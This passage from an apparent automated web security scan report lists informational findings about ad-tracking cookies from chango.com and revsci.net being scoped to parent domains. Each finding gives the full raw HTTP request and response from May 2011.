Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Thu, 12 May 2011 11:38:42 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

13.54. http://overseebroad.d.chango.com/c/t.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://overseebroad.d.chango.com
Path:   /c/t.js

Issue detail

The cookie set in the response below was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/t.js?partnerId=oversee-broad&domainTargeting=true&pageURL=http%3A%2F%2Fpepperhamilton.com%2F%3Fepl%3D7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA&referrerURL=http%3A%2F%2Fpepperhamilton.com%2F&q=find%20lawyers%20in%20your%20area%2CLaw%20firm%2Ccorporate%20law%2Csecurities%20law&t=%20%20pepperhamilton.com%20%20 HTTP/1.1
Host: overseebroad.d.chango.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ox=1; _i_st=1; _i_tm=1; _i_ab=1; _i_sl=1; _i_gid=1; _i_cw=1; _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; _i_pm=1

Response

HTTP/1.1 200 OK
Content-Length: 0
Server: Chango RTB Server
Etag: "da39a3ee5e6b4b0d3255bfef95601890afd80709"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Sun, 09 May 2021 12:01:53 GMT; Path=/
Connection: close


13.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The cookies set in the response below were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; 
udm_0=MLv39C8JZjpr557JwHIRxa5jdQTtJkLnfaG2qg26ZB+wNcQAqiLCTArLHxzvFq5u+Lz+XYjpAOoQ3aXCaMwHVm5cOqJ/d0MlRvTibudFpMUy2dKvpoh2P1mo4DwSF+J5ify/opKpgIxdjs+cX7AMJNbmkATqRCOXSBhPjm35XiawTtcNGQ5TJTiyxPEjXmxThYMLjriRmFvX70E3qN+4fQApOrjujKnAezgCnqbkesD3qtu7yg1H6t/ZCZjuqzbWj5lhOPrgUkFqFOsR5PZJAHdlKcx36ghEs5TWYHJ7Hb5xhWh0E2l5fLBFFP9WPKwWobSjkhpMDi+Kp1AIHk641P8IlIrWomP6IcaKegywe6Owy1lDPNerTKWUsO8YrjXR5olzyy6wLXb6gGqI3omVUL7fPu++A+wGAueB+FZJSxpjEvAreK7XIBTbcuoepx7qL5iMjyaXf9oM3XBiaEFzMNfE0EZUNyI851k2V1WfrejH4WhOwF/zC5Qx1MY4y6GGgNgNnM6HD7V0uycF+LhqJykGY4YcHQb969KlSx75jpXGB/Y/ThqH6llUenum15V8qhTvK/opGkRWSfypvacJFo/PisZ7zXvuoJPtRRvXdS91YPPi/PBgeOZkud3dhFAVymyT7s9aCy71tzZKcb+WKzUOfzdMURGelSLRiHB4XNxnJXS3aqrXBYAsmSu6iffgdJbwMaQekImLZY2TpMIEMIOwOVqRjv2KFv/fX3qS+FWOr2FXXkZjHTVFk5x0LCjJvfrRTvguz3DQbRk3HqOXmqZLJ5j/TXB5bo/MUYug8GlJm7j6TV56dmytyVVvb57ptvBNIgIwn6gR0mAdauLi+ddLwer1QnY/bDEfG507iGGrWyey/94fKyf08GlPmrwfeCUoafeWMYYsJtm/eyN5qIcmcZJeABqdn/9AcMC6mzYb4PGeNu/dr6gt21ABJDq7eJuaFP/RsBfVywN1CTWacnW9m/q5EM9J5MXRoLvnNM9IpaiCzJ8bs79erS+p9F5OJhHllfV8eWdDTtXvA9CnZalLPrGmqw4k9zwZNx0B1clOEPwH5yAlBM4opzlyVEoCF41x7KJj1/ZcwMyTwixt9Mb5iwRRiknHNgfkPDAzchcRdUulOpcg3ATua/3S7CAqTorLhCI6dYrWicgZcOEovUJIdhOG6gYyHef9Ru9lEst4DOzCXkT4zpeT1AyLuQ9Z99q9RBqO9+6yHMAVu5Ordcpplfmw84Ma1JYivS7vq1attqs5EJ7InICNPhTee28EyNp+84w1gvdN25jlYD98oAIdyzgUvUZuGspBPijyfewcj8G0XYzVD2dP1+fV/2/h1ge05Wg9JZ3wAItavV83LWV6mgBqCi29FCEmC1i2znwJzJao4Xeu3lR6It7bRRkLGkctRzQtZZJTMOfSZMCxUakuD0y1LkFwOmg3fVWDcLwE9WJY9rH2QYSk8UOjOZ+l4HB94xgHkRRAb3s2CmWW+sMtGsDM6ZEwDsT+AJZk36vciN7xsCmB7sJEYxcBeN70Q+53oATqe9cGbyzmI5FwovuwZA==; 
rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; 
rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; rsi_segs_1000000=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; rtc_7N2M=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; 
NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:29 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:38:29 GMT

GIF89a.............!.......,...........D..;

13.56. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/38529734.js

Issue detail

The cookies set in the response below were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/38529734.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%252F%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_6SVK=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; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_hjCW="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"; 
rsi_us_1000000="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"; udm_0=MLv39C8JZjpr557JwHIRxa5jdQTtJkLnfaG2qg26ZB+wNcQAqiLCTArLHxzvFq5u+Lz+XYjpAOoQ3aXCaMwHVm5cOqJ/d0MlRvTibudFpMUy2dKvpoh2P1mo4DwSF+J5ify/opKpgIxdjs+cX7AMJNbmkATqRCOXSBhPjm35XiawTtcNGQ5TJTiyxPEjXmxThYMLjriRmFvX70E3qN+4fQApOrjujKnAezgCnqbkesD3qtu7yg1H6t/ZCZjuqzbWj5lhOPrgUkFqFOsR5PZJAHdlKcx36ghEs5TWYHJ7Hb5xhWh0E2l5fLBFFP9WPKwWobSjkhpMDi+Kp1AIHk641P8IlIrWomP6IcaKegywe6Owy1lDPNerTKWUsO8YrjXR5olzyy6wLXb6gGqI3omVUL7fPu++A+wGAueB+FZJSxpjEvAreK7XIBTbcuoepx7qL5iMjyaXf9oM3XBiaEFzMNfE0EZUNyI851k2V1WfrejH4WhOwF/zC5Qx1MY4y6GGgNgNnM6HD7V0uycF+LhqJykGY4YcHQb969KlSx75jpXGB/Y/ThqH6llUenum15V8qhTvK/opGkRWSfypvacJFo/PisZ7zXvuoJPtRRvXdS91YPPi/PBgeOZkud3dhFAVymyT7s9aCy71tzZKcb+WKzUOfzdMURGelSLRiHB4XNxnJXS3aqrXBYAsmSu6iffgdJbwMaQekImLZY2TpMIEMIOwOVqRjv2KFv/fX3qS+FWOr2FXXkZjHTVFk5x0LCjJvfrRTvguz3DQbRk3HqOXmqZLJ5j/TXB5bo/MUYug8GlJm7j6TV56dmytyVVvb57ptvBNIgIwn6gR0mAdauLi+ddLwer1QnY/bDEfG507iGGrWyey/94fKyf08GlPmrwfeCUoafeWMYYsJtm/eyN5qIcmcZJeABqdn/9AcMC6mzYb4PGeNu/dr6gt21ABJDq7eJuaFP/RsBfVywN1CTWacnW9m/q5EM9J5MXRoLvnNM9IpaiCzJ8bs79erS+p9F5OJhHllfV8eWdDTtXvA9CnZalLPrGmqw4k9zwZNx0B1clOEPwH5yAlBM4opzlyVEoCF41x7KJj1/ZcwMyTwixt9Mb5iwRRiknHNgfkPDAzchcRdUulOpcg3ATua/3S7CAqTorLhCI6dYrWicgZcOEovUJIdhOG6gYyHef9Ru9lEst4DOzCXkT4zpeT1AyLuQ9Z99q9RBqO9+6yHMAVu5Ordcpplfmw84Ma1JYivS7vq1attqs5EJ7InICNPhTee28EyNp+84w1gvdN25jlYD98oAIdyzgUvUZuGspBPijyfewcj8G0XYzVD2dP1+fV/2/h1ge05Wg9JZ3wAItavV83LWV6mgBqCi29FCEmC1i2znwJzJao4Xeu3lR6It7bRRkLGkctRzQtZZJTMOfSZMCxUakuD0y1LkFwOmg3fVWDcLwE9WJY9rH2QYSk8UOjOZ+l4HB94xgHkRRAb3s2CmWW+sMtGsDM6ZEwDsT+AJZk36vciN7xsCmB7sJEYxcBeN70Q+53oATqe9cGbyzmI5FwovuwZA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_6SVK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kmheQIMDjaxY4NY56qG7poa4ScLEaatLDiorNn5vw/ZUtic7CM+ql6+GQ3/2mfzBOt0uz4ioZbxdZ4yKQR6q2VPvFKPznRql5h8iOvwP/r7Uf9IwSmkFH0NoNDiWsOdoP7A+KE3858M0WhU+zdS/59inCiCUTWQLaizzQIR1Jh2FmjnSE2fdifYxO0hFnS9FxZXoM+ewAQ+WVQFcEZFaUeEkXZNT/PBQgjdRcK4WGBrlOv1DqmZz7xuATb8CytltZbgXJJY58xcZwnCXCHFuTkIHFW1FoL2aE3zRAgMg51YquKmovdXv+QV0fhRfnE6xPSyEMpC58Mxj+nWjf7oD6WG0lAcTegTtCOgCgI2k1pcgBbUwiV80ods8sxbygUz1dWn6ZUvSekSbxlwCdRn098aaj47CC7oVk9kO1pb0VM9cA3b665SB+OhF1zFHEkp/+QDgoNrBn8VKykiY+qLw/Bu+8Nctq5EdHrD86cthCAfjJ+JvhBtr+hvqcWrBDZZ+BOW2Zj+sZGvsnMIE70w1kK6+FcYdWh7pzpV71WufhmJZAsP9t0SA6EQrS3/mb6hBtyus6WizP/iq6oNZERiMkyG4bHD5g0lcaW8LBUqxKHj8/Tqt+nPtAzGxPA1sGQ5x1/GDy6rIH0dmflRdEw4eI+C4e8g5L+zpQkeNco1i6W1TmWS8ddUxVEYkFvTgqscQGR2CT4TqyQ5P7VYSokaeW2RJdMkFPRFl0wJFkVyVYTst5kLNlTOSewhb3OmW4N3Mne/l1d+HJACtoFxAji0GHuoTyUdi5TqQ6rYK5yqaf9YyGEF3AbHBA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
Set-Cookie: NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b0b2&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:38:26 GMT; Path=/
Set-Cookie: rtc_Pt3a=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:38:26 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:26 GMT
Content-Length: 699

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['E05510_10428'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-
...[SNIP]...

13.57. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/203086575.js

Issue detail

The cookies set in the response below were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/203086575.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_vdh9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kOheAIMDjaxq2F29zEFqICTC+braGYRkX2ILzU0ubO+NO1EpsZ5SuHqPlIcMQ/0lXam/+piUhfp6MYDi5Ltmb3W/u0nGlRZLTdLeKuvFLJgwTUBQGmkGThl5pam9X0SDfBM1hv0IyFY0OJlD25LZxlv9giU9jzd4cBIDZmhH54Gojd6/jUtx5FZUgM0a+E9ZSdZZI5yoFedrb8//hiG6CEgOEMFcjoIeueUCxtkaeQDfr1Ybo11k8JXewFWXjFkF7Clb5Fbawer1yrgahjjsBaE5ImfVwFDpu70tLiWFMA3kByEjqxkCdipzMTXYEaeZJ6BgxzRBIFTNqAqAzi/oX38PIZd66GdRlw8ucpDQxfmw6gdlHEU9znYrpDT4IHGwFrIVJvCqMoVFODAapUufdY9wfxryj4I4tUp6M1QwerLGSqWdi/5zP8Tczymm7yXUan3PBm+/v+pJydx2y4M/bpTik+dJkknw763IQz49m9/lp1xnGhB4rBJAilJb7rRfb1QpgqVkYr0LKAmIEnp+MOPBdEoEOQtUtl9mNyfeZ0o0vJ3TMg+0ybtwr5WKuG4CyJaerSWqG6+zaw3jmwxR63lfJqcBVOtpwnNvfz/fCFZe8ylIa/BMzgeHRC6dvYmU4reagzBAkh4i5kSxtwbOhcV3Cy1XGJAht5G1Q2bdyaxqHaj4Oa2P8csqTtEL8sW1qo1xQfNlI5qOPJGGlpX0zHyHPmhpn/MmF2MU2O1Wl3oRKRA1mGN/u2wrZ8lnqzpMHmMYzTXfJOZcCFpZWp5amWwhA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
Set-Cookie: rtc_WdNx=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
X-Proc-ms: 2
